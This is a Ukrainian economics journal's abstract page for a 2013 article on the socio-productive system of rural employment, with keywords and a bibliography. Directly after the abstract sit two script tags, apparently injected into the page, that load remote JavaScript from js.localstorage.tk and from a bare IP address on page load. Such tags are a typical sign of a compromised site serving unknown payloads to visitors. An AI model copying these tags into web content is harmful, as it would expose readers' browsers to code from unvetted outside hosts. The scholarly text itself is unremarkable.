ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 331.526-058.244
Проблеми економічної теорії

Теоретична сутність соціально-виробничої системи зайнятості населення / Токарчук Д. М. // Економіка АПК. - 2013. - № 9 - С. 98

Висвітлено формування та функціонування соціально-виробничої системи зайнятості населення як передумови соціально-економічного розвитку села. Узагальнено теоретико-методологічні підходи до розуміння категорії «зайнятість», запропоновано її авторське тлумачення. Обґрунтовано поняття «соціально-виробнича система зайнятості», яка за змістом включає сукупність працездатного населення, державних і приватних структур, що прямо чи опосередковано забезпечують зайнятість, а також відносини, що виникають між ними у процесі навчання, здобуття кваліфікації, працевлаштування, праці та професійного розвитку. Досліджено основні складові соціально-виробничої системи зайнятості: підсистеми освіти, працевлаштування, професійного розвитку, робочих місць і трудових відносин. Визначено їхню роль у забезпеченні зайнятості населення. Рис.: 2. Бібліогр.: 21.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: зайнятість, праця, соціально-виробнича система зайнятості, кваліфікація, професійний розвиток, трудові відносини

Список використаних джерел

 1. Балабанова Л.В. Управління персоналом : навч. посіб. / Л. В. Балабанова, О. В. Сардак. – Донецьк : ДонДУЕТ, 2006. – 276 с.
 2. Верба Д.В. Відтворення робочих місць підприємства як чинник продуктивної зайнятості : автореф. дис. ... канд. екон. наук : спец. 08.00.07 «Демографія, економіка праці, соціальна економіка і політика» / Д. В. Верба. – К., 2008. – 34 с.
 3. Грішнова О.А. Економіка праці та соціально-трудові відносини : підруч. / О.А. Грішнова – К. : Знання, 2004. – 535 с.
 4. Економіка праці і соціально-трудові відносини : підручник / [Шкільов О.В., Барабан С.С., Ярославський В.А. та ін.] ; під ред. д-ра екон. наук. проф. О. В. Шкільова. – К. : Четверта хвиля, 2008. – 472 с.
 5. Как россияне ищут работу [Электронный ресурс]. – Режим доступа : http://ria.ru/infografika/20090217/162394296.html.
 6. Крушельницька О.В. Методологія та організація наукових досліджень : навч. посіб. / О.В. Крушельницька – К. : Кондор, 2003. – 192 с.
 7. Махсма М. Активна політика зайнятості в контексті розвитку сільських територій: регіональний досвід регулювання / М. Махсма // Україна: аспекти праці. – 2006. – № 6. – С. 10–15.
 8. Назарко С.О. Вплив освіти на регіональний людський розвиток і зайнятість населення / С.О. Назарко // Актуальні проблеми економіки. – 2009. – № 4 (94). – С. 166–171.
 9. Основні засади розвитку вищої освіти України в контексті Болонського процесу (документи і матеріали 2003–2004 рр.) / [В. Г. Кремінь, М. Ф. Степко, Я. Я. Болюбаш та ін.]. – Тернопіль : Тернопіл. держ. пед. ун-т, 2004. – 146 с.
 10. Політична економія : підруч. / В. Г. Федоренко, О. М. Діденко, М. М. Руженський, О. Ф. Іткін ; під наук. ред. д-ра екон. наук проф. В. Г. Федоренка. – К. : Алерта, 2008. – 488 с.
 11. Статистична інформація [Електронний ресурс] / Держслужба статистики України. – Режим доступу : www.ukrstat.gov.ua.
 12. Структура Державної служби зайнятості [Електронний ресурс]. – Режим доступу : http://www.dcz.gov.ua.
 13. Терон І.В. Модернізація зайнятості населення регіонів у контексті реалізації інноваційної моделі розвитку економіки України / І. В. Терон // Формування ринкових відносин в Україні : зб. наук. праць. – К., 2006. – Вип. 2 (57). – С. 111–115.
 14. Токарчук Д.М. Сучасний стан та перспективи розвитку соціально-виробничої інфраструктури села / Д. М. Токарчук // Зб. наук. праць ВНАУ. Серія: Економічні науки. – 2010. – № 4. – С. 118–127.
 15. Україна. Закони. Про вищу освіту : Закон України від 17.01.2002 р. № 2984-ІІІ, із змінами та доп. – К. : Атіка, 2004. – 42 с.
 16. Україна. М-во освіти і науки. Щодо нормативно-методичного забезпечення розроблення галузевих стандартів вищої освіти [Електронний ресурс] : лист М-во освіти і науки України від 31.07.2008 р. №1/9-484 (текст правового акту із змін. та доп. на жовт. 2010 р.). – Режим доступу : http://uapravo.net/akty/law-resolution/akt3dpit8n/index.htm.
 17. Ціжма Ю.І. Концептуальні основи дослідження структури зайнятості населення [Електронний ресурс] / Ю.І. Ціжма – Режим доступу : http://www.rusnauka.com/3_SND_2010/Economics/52992.doc.htm.
 18. Шпикуляк О.Г. Трудовий потенціал села та кадрове забезпечення аграрних підприємств / О.Г. Шпикуляк // Агроінком : Аграрний інформаційний науково-виробничий журнал. – 2005. – №5/6. – С. 62-63.
 19. HM Treasury Productivity in the UK: 3 – The regional dimension. – London : HM Treasury, 2001.
 20. Hogarth T. Skills Matter : Synthesis Report from the Extent, Causes and Implications of Skill Deficiencies Study / T. Hogarth, R. Wilson. – Nottingham : DfES Publications, 2001.
 21. Shucksmith M. Exclusive Countryside? Social inclusion and regeneration in rural areas / Shucksmith M. – York : Joseph Rowntree Foundation, 2000.
Читати статтю: 13_09_98-104.pdf